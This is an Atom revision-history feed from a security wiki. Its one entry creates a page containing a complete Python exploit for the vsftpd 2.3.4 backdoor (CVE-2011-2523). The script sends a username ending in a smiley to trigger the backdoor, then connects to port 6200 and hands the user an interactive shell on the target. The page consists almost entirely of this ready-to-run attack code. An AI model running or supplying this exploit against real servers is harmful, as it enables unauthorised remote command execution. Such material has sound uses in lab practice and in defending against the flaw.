<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2011-2523_vsftpd_2.3.4_%E5%BE%8C%E9%96%80%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2011-2523 vsftpd 2.3.4 後門命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2011-2523_vsftpd_2.3.4_%E5%BE%8C%E9%96%80%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2011-2523_vsftpd_2.3.4_%E5%BE%8C%E9%96%80%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T01:27:37Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2011-2523_vsftpd_2.3.4_%E5%BE%8C%E9%96%80%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1571&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thoma...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2011-2523_vsftpd_2.3.4_%E5%BE%8C%E9%96%80%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1571&amp;oldid=prev"/>
		<updated>2021-04-13T02:09:15Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thoma...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution&lt;br /&gt;
# Date: 9-04-2021&lt;br /&gt;
# Exploit Author: HerculesRD&lt;br /&gt;
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html&lt;br /&gt;
# Version: vsftpd 2.3.4&lt;br /&gt;
# Tested on: debian&lt;br /&gt;
# CVE : CVE-2011-2523&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3   &lt;br /&gt;
                                                           &lt;br /&gt;
from telnetlib import Telnet &lt;br /&gt;
import argparse&lt;br /&gt;
from signal import signal, SIGINT&lt;br /&gt;
from sys import exit&lt;br /&gt;
&lt;br /&gt;
def handler(signal_received, frame):&lt;br /&gt;
    # Handle any cleanup here&lt;br /&gt;
    print('   [+]Exiting...')&lt;br /&gt;
    exit(0)&lt;br /&gt;
&lt;br /&gt;
signal(SIGINT, handler)                           &lt;br /&gt;
parser=argparse.ArgumentParser()        &lt;br /&gt;
parser.add_argument(&amp;quot;host&amp;quot;, help=&amp;quot;input the address of the vulnerable host&amp;quot;, type=str)&lt;br /&gt;
args = parser.parse_args()       &lt;br /&gt;
host = args.host                        &lt;br /&gt;
portFTP = 21 #if necessary edit this line&lt;br /&gt;
&lt;br /&gt;
user=&amp;quot;USER nergal:)&amp;quot;&lt;br /&gt;
password=&amp;quot;PASS pass&amp;quot;&lt;br /&gt;
&lt;br /&gt;
tn=Telnet(host, portFTP)&lt;br /&gt;
tn.read_until(b&amp;quot;(vsFTPd 2.3.4)&amp;quot;) #if necessary, edit this line&lt;br /&gt;
tn.write(user.encode('ascii') + b&amp;quot;\n&amp;quot;)&lt;br /&gt;
tn.read_until(b&amp;quot;password.&amp;quot;) #if necessary, edit this line&lt;br /&gt;
tn.write(password.encode('ascii') + b&amp;quot;\n&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
tn2=Telnet(host, 6200)&lt;br /&gt;
print('Success, shell opened')&lt;br /&gt;
print('Send `exit` to quit shell')&lt;br /&gt;
tn2.interact()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>